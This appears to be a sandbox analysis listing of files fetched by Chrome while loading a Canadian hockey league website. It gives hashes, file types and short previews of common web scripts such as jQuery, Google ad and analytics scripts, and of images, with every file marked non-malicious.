                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JSON data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):69862
                                                                                                                          Entropy (8bit):5.932117284814778
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:Tk98glRj5nDFvSCd1CORGYh8pLVEC5xxB701Y:g984ZPvSCdLMOml7
                                                                                                                          MD5:993EF487E55E37DEC643CA2593B11F09
                                                                                                                          SHA1:FFD00C934B04A8675E7F67B7C62165F422C67F6F
                                                                                                                          SHA-256:07683959347E8EF06A768A42CA0808CD67178A0A3EAC04242155B90565048CEF
                                                                                                                          SHA-512:A237AAB23D20A6E4A19B119B98F16A58A2B1FF65E57B95347DD2C8CE627D937D1BB8639FD78203AD090C30EE5EB7FD0ABE345B2D172BB2AA50B09A34866F1ED4
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:{"/128473736/GTHL_BigBox_1":["html",0,null,null,0,250,300,0,0,null,null,null,1,[["ID=32139368be96b47b:T=1736802084:RT=1736802084:S=ALNI_Ma4HoZn3RP7LgcjSZKvj9J3BrnjEw",1770498084,"/","gthlcanada.com",1],["UID=00000fcdc49c4b31:T=1736802084:RT=1736802084:S=ALNI_MbA2srzH_cOT9Vl0El0AgR1cXV73A",1770498084,"/","gthlcanada.com",2]],[138477670473],[6736154137],[1138327936],[3553617818],null,null,null,null,null,null,null,0,null,null,null,null,null,null,"AOrYGsm_Oyr5Ja2y7R_J0niWOvziIAtIRKI8CZEDXEHbYK1yipi43BazOFM6hcZxvOJSQg4HeiiA80W4hgTyuA","CICsnfrL84oDFcAATwgd-FA7JQ",null,null,null,null,null,null,null,null,null,null,null,null,null,null,"1",null,null,null,null,null,null,null,null,null,null,null,"AA-V4qP-oB5Z8Blts5NP3nqvFctIqz9ddX21a4Ce4UoxpP5HJXnJm6_K8HI4qDpsBnCjMz4eq6o3CBWY",null,null,null,null,null,null,[["ID=e8078eb121809190:T=1736802084:RT=1736802084:S=AA-AfjYJqQW0hXSDayjwIolViJky",1752354084,"/","gthlcanada.com"]],[]]}.<!doctype html><html><head><script>var jscVersion = 'r20250109';</script
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (3846)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):653479
                                                                                                                          Entropy (8bit):4.554223980280399
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:E0jAzaWuIbUsNeTN8S571aZsqa9QhiOwaELasD:XNIbQqsD
                                                                                                                          MD5:D1D3B8A5E9BB121D66BD3381AD17ECF1
                                                                                                                          SHA1:50655C7FF064BDB559BF21FF07967247798108BD
                                                                                                                          SHA-256:FCEC6E1FB0A351B2ABDAFB91319F202636CF8325F9FE21A0FF702EBDF5F8AF13
                                                                                                                          SHA-512:D3CEDC991EF892B1BE71959BD64F262E5CD784813C9BFDC367A198F864EF49BF6EC21044D8911E7AFF027EE1E387742F3A33F21AC9DB75A606C147AAC8249735
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://gthlcanada.com/app/themes/base/assets/dist/scripts/js/main.js
                                                                                                                          Preview:(function() {. var $, Ad300, ArenaTable, BaseTableMixin, BracketApp, BracketChampion, BracketModal, BracketModalGame, BracketPage, BracketRound, BracketSeries, BracketSeriesTeam, CSASeasonViewSelect, CoachesTable, DivisionStandings, GameBox, GameDaySelect, GamecentreApp, GamecentreBoxscoreTab, GamecentreHelperMixin, GamecentreIcerink, GamecentreMatchup, GamecentrePage, GamecentrePlayByPlayTab, GamecentrePreviewTab, GoalieStatsTable, GoaliesTable, HeadToHeadTable, HomeAwayTable, HomeAwayViewSelect, IcerinkPlayPopup, IcerinkPoint, ItemMixin, Last10Table, LastFiveTable, LeadersCategory, LeadersPage, LeagueLeaders, LeagueStars, LeftMenu, LeftMenuItem, LegacyGoalieStatsTable, LongestStreaksTable, MVPSummary, MatchCenterHighlightsTab, MatchCenterMatchStatsTab, MatchCenterPreviewTab, MatchCentreApp, MatchCentreHeader, MatchCentrePage, MatchUpTable, MatchupLinks, MatchupScorecard, MatchupSummary, MatchupTeam, Modal, MonthSelect, MoreGoaliesTable, NetworkHeader, OHLLegacyPlayerStatsTable, OHLS
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (33090)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):108693
                                                                                                                          Entropy (8bit):5.604078896439248
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:tA5s/tiRO0PDu7OqnqpsP/3INTsp7q7N7W3UjrZ60ohPqrCOk:P/t8RybGTvNzWOk
                                                                                                                          MD5:7D8A051F450F7F40F920DA00BD264121
                                                                                                                          SHA1:94F188F00FED4F7F301FEFBCD67A885A7275101B
                                                                                                                          SHA-256:3DC7FEE86C3CBBED85D52183A7A7424F2020886441495851174496583BBE0A82
                                                                                                                          SHA-512:09CC2D6DC4794E2F70869B9ACD52E9A07F0EB49B4E830A1F1D8A12DF90A07EFC465F79978E089D093C7CF087C16D89D35CAB57447D6859E1669CD3A8B08A7358
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://www.googletagservices.com/tag/js/gpt.js
                                                                                                                          Preview:(function(sttc){var window=this;if(window.googletag&&googletag.evalScripts){googletag.evalScripts();}if(window.googletag&&googletag._loaded_)return;var p,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");},da=ca(this),ea=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",u={},fa={},v=function(a,b,c){if(!c||a!=null){c=fa[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}},w=function(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var e=d[0],f;!a&&e in u?f=u:f=da;for(e=0;e<d.length-1;e++){var g=d[e];if(!(g in f))brea
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (32077)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):97184
                                                                                                                          Entropy (8bit):5.373357406768198
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:GYE1JVoiB9JqZdXXe2pD3PgoIiulrUdTJSFk/zkZ4HjL5o8srOaS9TwD6b7/Jp97:t4J+R3jL5TCOauTwD6FdnCVQNea98Hrm
                                                                                                                          MD5:8610F03FE77640DEE8C4CC924E060F12
                                                                                                                          SHA1:076524186DBBDD4C41AFBBD6B260D9E46A095811
                                                                                                                          SHA-256:FC48D1D80ECE71A79A7B39877F4104D49D3DA6C3665CF6DC203000FB7DF4447E
                                                                                                                          SHA-512:10FE149F49675C81BDD7C9D8323E7C5C42FF587028DE0783ABD1C62CFCA8F34142A1CF34260F2C6CF601A507F599BD384C044409350EFB83D3EEF2326003F62F
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:/*! jQuery v1.12.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="1.12.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.ca
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 48 x 48, 8-bit gray+alpha, non-interlaced
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):665
                                                                                                                          Entropy (8bit):7.42832670119013
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:6v/7OEUelyuRs56fyKgIEInu5VLJBZInmJhd/3VqQXD8GBm1:belFRs56fuIEIu5VNBZInMTICfBO
                                                                                                                          MD5:07BF314AAB04047B9E9A959EE6F63DA3
                                                                                                                          SHA1:17BEF6602672E2FD9956381E01356245144003E5
                                                                                                                          SHA-256:55EAF62CB05DA20088DC12B39D7D254D046CB1FD61DDF3AE641F1439EFD0A5EE
                                                                                                                          SHA-512:2A1D4EBC7FBA6951881FD1DDA745480B504E14E3ADAC3B27EC5CF4045DE14FF030D45DDA99DC056285C7980446BA0FC37F489B7534BE46107B21BD43CEE87BA0
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://www.gstatic.com/recaptcha/api2/info_2x.png
                                                                                                                          Preview:.PNG........IHDR...0...0.......1.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.........IDATX..W..DA.=.6O...H.,E.............b.....C.1...1..EbLPI.W......H..s.z5.:..._.d.0.u.......j.x.R..._.v..R...1..ir..`.yn..R..j.h./y..l......(`..5....l.E..0......B^......F.....F....Y|p..._,p.............(3^.r.P.O......;<....z.,..yF....N..x.MS...Q.C%......D8G.+......oOk...)T..}|..e...G.....'.R..G.Z.T}7(...&..@...G....$PGYv...A.c.]d....N..'.4b...R.%..)2Yd..b.M..^@.M....^.:h.N(dP*t..RQ%.o...{.vGH..S._".@./...g.....]...?..h..E.,r.m.%."."W.6G..t...->....q\.Kc.t"^......Kj~{l..C..).y..><@|yB....=c.............!...<....IEND.B`.
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (2343)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):52916
                                                                                                                          Entropy (8bit):5.51283890397623
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:oHzaMKHBCwsZtisP5XqYofL+qviHOlTjdNoVJDe6VyKaqgYUD0ZTTE8yVfZsk:caMKH125hYiM8O9dNoVJ3N48yVL
                                                                                                                          MD5:575B5480531DA4D14E7453E2016FE0BC
                                                                                                                          SHA1:E5C5F3134FE29E60B591C87EA85951F0AEA36EE1
                                                                                                                          SHA-256:DE36E50194320A7D3EF1ACE9BD34A875A8BD458B253C061979DD628E9BF49AFD
                                                                                                                          SHA-512:174E48F4FB2A7E7A0BE1E16564F9ED2D0BBCC8B4AF18CB89AD49CF42B1C3894C8F8E29CE673BC5D9BC8552F88D1D47294EE0E216402566A3F446F04ACA24857A
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://www.google-analytics.com/analytics.js
                                                                                                                          Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self,p=function(a,b){a=a.split(".");var c=n;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};function q(){for(var a=r,b={},c=0;c<a.length;++c)b[a[c]]=c;return b}function u(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZ";a+=a.toLowerCase()+"0123456789-_";return a+"."}var r,v;.function aa(a){function b(k){for(;d<a.length;){var m=a.charAt(d++),l=v[m];if(null!=l)return l;if(!/^[\s\xa0]*$/.test(m))throw Error("Unknown base64 encoding at char: "+m);}return k}r=r||u();v=v||q();for(var c="",d=0;;){var e=b(-1),f=b(0),h=b(64),g=b(64);if(64===g&&-1===e)return c;c+=String.fromCharCode(e<<2|f>>4);64!=h&&(c+=String.fromCharCode(f<<4&240|h>>2),64!=g&&(c+=String.fromCharCode(h<<6&192|g)))}};var w={},y=function(a){w.TAGGING=w.TAGGING||[];w.TAGGING[a]=!0};var ba=Array.isArray,c
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (33090)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):108454
                                                                                                                          Entropy (8bit):5.602814967873031
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:tA5s/tiRO0PDu7OqnqpsP/3INTsp7q7N7W3UjrZ60ohPqrCOi:P/t8RybGTvNzWOi
                                                                                                                          MD5:7970990FAD2337F16558F06D2C6A4CA8
                                                                                                                          SHA1:63554C4740AF716F5711B38010E8DB961B6202C7
                                                                                                                          SHA-256:63764B320FF58BA38D000CD6EBD61AF835E7BC8938D00E6564CECADEAEEF17A6
                                                                                                                          SHA-512:C2B7FEF94BDBF1B83361E8C1C438E30EC5C87C0128693A98800A9D120353E047C9E03553D5EB1DC8DF57DD5FE519B9839A50897FB179AC277836A29A564D096F
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:(function(sttc){var window=this;if(window.googletag&&googletag.evalScripts){googletag.evalScripts();}if(window.googletag&&googletag._loaded_)return;var p,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");},da=ca(this),ea=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",u={},fa={},v=function(a,b,c){if(!c||a!=null){c=fa[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}},w=function(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var e=d[0],f;!a&&e in u?f=u:f=da;for(e=0;e<d.length-1;e++){var g=d[e];if(!(g in f))brea
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 240x240, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=10, manufacturer=Canon, model=Canon EOS 5D Mark IV, xresolution=162, yresolution=170, resolutionunit=2, software=Adobe Lightroom 7.3 (Macintosh), datetime=2024:06:09 14:44:45], baseline, precision 8, 730x487, components 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):117751
                                                                                                                          Entropy (8bit):7.857282144413212
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:z+V9bk9vuGf3qBTeRcwz1JeYvvSTHfWKxP:29b6XfaBT0H1JJvvwHeKx
                                                                                                                          MD5:7629A9E02FDD4EB994AF9913381DFB63
                                                                                                                          SHA1:27B457A47A22F28A0F931DA79B87802746590041
                                                                                                                          SHA-256:29EE69914722262D4B6CBD80478616701E0D55FE13238A358B29E00D81525E47
                                                                                                                          SHA-512:447B5FCA8409EF9E0A476FB1CEB8BA2515B5325D110FB0E5A5463D661DD2047C2D708467706CB0EAEF9700EEDD9AD9E78A0DB5FF7CD934FDB732D6B266DCA890
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:......JFIF............J.Exif..II*.......................................................(...........1... .......2...........;.......................i...........d...Canon.Canon EOS 5D Mark IV..................Adobe Lightroom 7.3 (Macintosh).2024:06:09 14:44:45.ALEX TE.ALEXJSTE..!........................."...........'...........0...........2...................0231........................................................................................................................................................00..........00..................................................................................................1...........2....... ...4.......@...5.......X.......................2024:06:06 21:18:29.2024:06:06 21:18:29.-04:00..-05:00..-05:00..X.y.@B...T-.@B............................f......\D.....192156000129..........F.......................EF24-70mm f/2.8L II USM.1517002438........................................(...............................*G..............................
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):42
                                                                                                                          Entropy (8bit):2.9881439641616536
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                          MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                          SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                          SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                          SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:GIF89a.............!.......,...........D.;
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (1382)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):17945
                                                                                                                          Entropy (8bit):5.330388445341784
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:AbnElW+CdYyqBFy9G/JtCHAOgRImVWsc5JZB:Ll3CdnqC9ct2A1ImVWsc5h
                                                                                                                          MD5:3B071D5606CC1CF92AE307F5BDB4E540
                                                                                                                          SHA1:E191068CC90E5489130489A1CF173FE50BBA28B8
                                                                                                                          SHA-256:FF3DE130872FE0FB5B770DFA2BC9F0DAF8AB320403A34A60D089436F08D24F99
                                                                                                                          SHA-512:8A1287D7528B2B65D61D6E0A639F2CBE5658AFC3EDB5E2AF9494E8CC876AA6C8060A55D3BD4AA85A0B3B82733E64F7F7A6B4A5F2597FD99FD37136A83A6BBCAD
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:(function(){'use strict';function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var k=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ba(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var n=ba(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",r={},u={};function w(a,b,c){if(!c||a!=null){c=u[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}}.function x(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var g=d[0],f;!a&&g in r?f=r:f=n;for(g=0;g<d.length-1;g++){var e=d[g];if(!(e in f))break a;f=f[e]}d=d[d.length-1];c=p&&c==="es6"?f[d]:null;b=b(c);b!=null&&(a?k(r,d,{configurable:!0,writable:!0,value:b}):b!==c&&(u[d]
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], baseline, precision 8, 300x250, components 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):51042
                                                                                                                          Entropy (8bit):7.836981718851626
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:Voq0g38LDQUk0k4Tie2Jpbj/6ASPMqzfkP1H9BmFpoVKIMPKL23MM2xft:Vl0fLsUIGQBD6kP1iPcJft
                                                                                                                          MD5:60E065AB96E4FA2C0FF0050A5F3D4A11
                                                                                                                          SHA1:E118BB74CFA87728C92A122D281699C13D72E04B
                                                                                                                          SHA-256:010BBE30B6945FFE24CE5F09FBB11A1639B6DADEDDDE85300DC7C5A7A2EAF8D6
                                                                                                                          SHA-512:8A462C0B3C19084D29818DB23F157A5FC7B590B6C571D85E00D39824A52AC56863D128EBF39861140AD1C3A3B95E7516E854CD50602CD0B6479555B3B3DC6277
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:......JFIF.....H.H....4.Exif..MM.*.............................V...........^.(.......................i.........f.......H.......H..............0221....................0100.......................,...................................................................(................................3........H.......H............................................................................................................................................................."........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....1........n..R...Q....g...-.K...|.m.RV[iN...;..q_....._.%..A.........i..nW......c..
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 38x38, segment length 16, baseline, precision 8, 730x411, components 3
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):24312
                                                                                                                          Entropy (8bit):7.8774288767841965
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:384:qmw2DeFLgLkE1IDzM2B8EEVYA6zH7wCMyiC6noT3YyQsxocLPpo5l:qmk3E1IDYR6AgH7wCXiCt7h/xocLPpml
                                                                                                                          MD5:F69CC52CD81A54B5012B2ADA2461726B
                                                                                                                          SHA1:EAE1A1B9979442EB8B89E4A6CC1566B4FCF9E06F
                                                                                                                          SHA-256:87444690369A822142419685C427E194225E0CEC1B2F1B7B93FCBBF06ADDB4DF
                                                                                                                          SHA-512:ED3DDBEBDAE6314080087D57F0140BFE64398122BCEE89D7F6608FDD49942600FB65D9862B27A5D29BE137ECC64784FF8B66FFF3573EF9E254D929504DC5A419
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          URL:https://d2pr6pnwfmh0za.cloudfront.net/app/uploads/gthl/2024/10/10101535/2024-World-Mental-Health-Day-Challenge-1600x900-730x411.jpg
                                                                                                                          Preview:......JFIF.....&.&.....C....................................................................C............................................................................".........................................[...........................!1.."AQa..2q..#RSb..B...3CUr......$7DTu.%46s......&'58EWt..ce..................................E........................!..1AQaq."2.....B..R..#.....5F..$3DSb..................?...D@...DD....D@...DD....D@...DD....D@...DD....D@...DD....D@...DD....D@...DD....B@.$.;.%.3....B.J(>.....}m...@ME....Q..%.i...@LE.......w..-._Y.}g~..R}..%.%.q_H..."...gr..4.T\.....}.r.""...." ...""...." ...""...." ...""...." ...""...." ...""...." ...""...." ...""...." ...""...." ..."".....<.....+........Q<.W..F;9.G.@p.*k..h8...R.....!'.p.]<...F..>%d@F..O...\z.....T.@E.e/.w.\z....5-u.F\X$n.....oU.x...U7...LD./US.w........,.\ ..7o.9..c.......p@`6...w.u6..3..C..G. *.j.o.....^.....|.U. *....q.sVx..?..G.J.Z..9....%.,...>-....e4.....fU.ZO8..9`.}.......*.n....j..D3...
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (24489)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):170649
                                                                                                                          Entropy (8bit):6.264588167926433
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:bDymDKhDgICDNt1oFCM4lyGGWgHh6F99nxV6mL2xkHR:bjKhDgIANt3lGWgyxj2xkx
                                                                                                                          MD5:CF6D65FE3E48CB35829102F380404E20
                                                                                                                          SHA1:E78302BAF621AF7730AA14378D8355BC70F2CBCD
                                                                                                                          SHA-256:69D1108B4F184C220F5C3C7780BAF395E43679FDC595492C974990627D48FE59
                                                                                                                          SHA-512:DAA24E7D7253674985CC5020AB818713DF3BB955BD8EBF77D65442B3E4068C1B8D6EBCD9EE7919419516E1EB0234ADAC0D1737F64D390AE763CE3D917D8D9FCA
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:!function(a,b){"object"==typeof exports&&"undefined"!=typeof module?module.exports=b():"function"==typeof define&&define.amd?define(b):a.moment=b()}(this,function(){"use strict";function a(){return Md.apply(null,arguments)}function b(a){Md=a}function c(a){return"[object Array]"===Object.prototype.toString.call(a)}function d(a){return a instanceof Date||"[object Date]"===Object.prototype.toString.call(a)}function e(a,b){var c,d=[];for(c=0;c<a.length;++c)d.push(b(a[c],c));return d}function f(a,b){return Object.prototype.hasOwnProperty.call(a,b)}function g(a,b){for(var c in b)f(b,c)&&(a[c]=b[c]);return f(b,"toString")&&(a.toString=b.toString),f(b,"valueOf")&&(a.valueOf=b.valueOf),a}function h(a,b,c,d){return Ca(a,b,c,d,!0).utc()}function i(){return{empty:!1,unusedTokens:[],unusedInput:[],overflow:-2,charsLeftOver:0,nullInput:!1,invalidMonth:null,invalidFormat:!1,userInvalidated:!1,iso:!1}}function j(a){return null==a._pf&&(a._pf=i()),a._pf}function k(a){if(null==a._isValid){var b=j(a);a._
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 38x38, segment length 16, baseline, precision 8, 730x411, components 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):27788
                                                                                                                          Entropy (8bit):7.850273442343946
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:CQPlful62p4PxOcgqU7daCm+iSejI+miYPl55MOD3Cp:VxlcIU5JPOIhiY/lD3Cp
                                                                                                                          MD5:23A35E3DC32BA6651058DC1BB5411C18
                                                                                                                          SHA1:763BBA24B0FA26F2A89770320537EEFF4699BC67
                                                                                                                          SHA-256:2EF95DCB23E591460ECBB6C58F8B5B08E263F49FF9A852D487E161FE86C761BB
                                                                                                                          SHA-512:0E3218FE606F9B15BA38933717D708FEDA908255AB6AA741C47BF753EB50EF325D2C54147DDAE7A4622C0C156D7A7ECA1B747EAFE0C785F5964F6995BD73C972
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:......JFIF.....&.&.....C....................................................................C............................................................................"..........................................Z.........................1..!Q..A.."Waq......2.....#45BRUs....6TVbrt.$%37CGSu........D.c..................................I..........................!1A..Qa....Rbq...."2Scr......#4B..35.CD..6s..............?.. ..s...............p....YSR.......{.....cYQ../.],..M.....K......'.%...mci[IJt..a..seMK..scW.5.:.u/..(..V..9e.J...-..t.J..[.x.k.1[.......D.R.R[.....4........(..........Iq.....].....@....*.@.........qb......5.....A-.I`.R..hI.................`.....B..(..`.....................^.e...@.|.9....7m.....{>.4kY2._...o."..15_.....t...+.#...t...;.|..z..-ToG1..V.,.....|..q..N[.Kw.......[..........c....g....u~..........seMK..skW.5.7....eYQ../.],..K............'.%..Kk.J.JS$.{.O..*jX.......a.Z.P.....A.l.-..Q.z....U.X...n5.....]..{..$*..*...%.....H]Hd..e..........
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:gzip compressed data, original size modulo 2^32 2641
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):927
                                                                                                                          Entropy (8bit):7.799969426492565
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:X7HHv61JwFiHEhpB9gnaXw75wRI1U1JReBhHrk0fL/MX:XrUyYHE/BKcMwyU1ChLL/I
                                                                                                                          MD5:AA205C5159E1B6C20D6EC93077BCDDC3
                                                                                                                          SHA1:EA32FA5959981F7D6740D9637FB70A06F934EC25
                                                                                                                          SHA-256:995B282408A71EEA22C6685F27FD38C389AF433A2432EB57C9B320A45C89A545
                                                                                                                          SHA-512:DDEFA315E2BB645329831F32DAE205825157B0E99AF2C09371A4D5FCECF90360D8B9BF1C55E761AF1C05EA2850E60EC86B3911DE4A404069A65BD932F434751B
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:...........U]o"7..+^W...........n.R.m...D.c_..3.z<$(...g`....}...0..{|...V....[MGt.\1:;{zzz.M^:.;.u.;|^.iX0}V.]+.Aa.Z...s...L....R.pcU....a.....T. .bJ..A..)[..>X`.,.3.#.re.#l......b.).g.\..eIG/.5.'.........iM>.&.....Q^i}d.v6...)...Ip06.v.oh..2...4..B..~".E._...v..C.]..Y...'{....V.v.JgV7Mmn.V..........B.F.....k@......u..>..N....M*t...._/..\..Z^fT.|Q....hF!....hgF....@.rVG.y..V.p...K....<v...X..R.....3.Q2]....MT.vq..Q.Pv.^.....A..Y0.,... .A...k.....l.VY.*.29..R...xN9]...6.w.pw5!Sx*...X...V-rR...NN..fI........!.1.......s.......5..y..r.3....xw..w$j.........s...v.$M.K.+..=.0.q..\.7*....>Y..o.n.+...K.,.F.`..I.G. `<.A..|...(...\4.".Q..)C.G....q.&...1^9.f9.1..Z*,.*A..:Tc.!W=No.5....\...=.f.C|.7...a.....0.$?...)V.;.v......Je1......I..H5.W8_./]..J.y].y.gm......~9-..W....9.+..C..w_u..$......u.@t......(.Yy..i....,.f....n..q*.`,`...;..)....-.C......bo..l...L..~..r.=l...GT.Q...
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
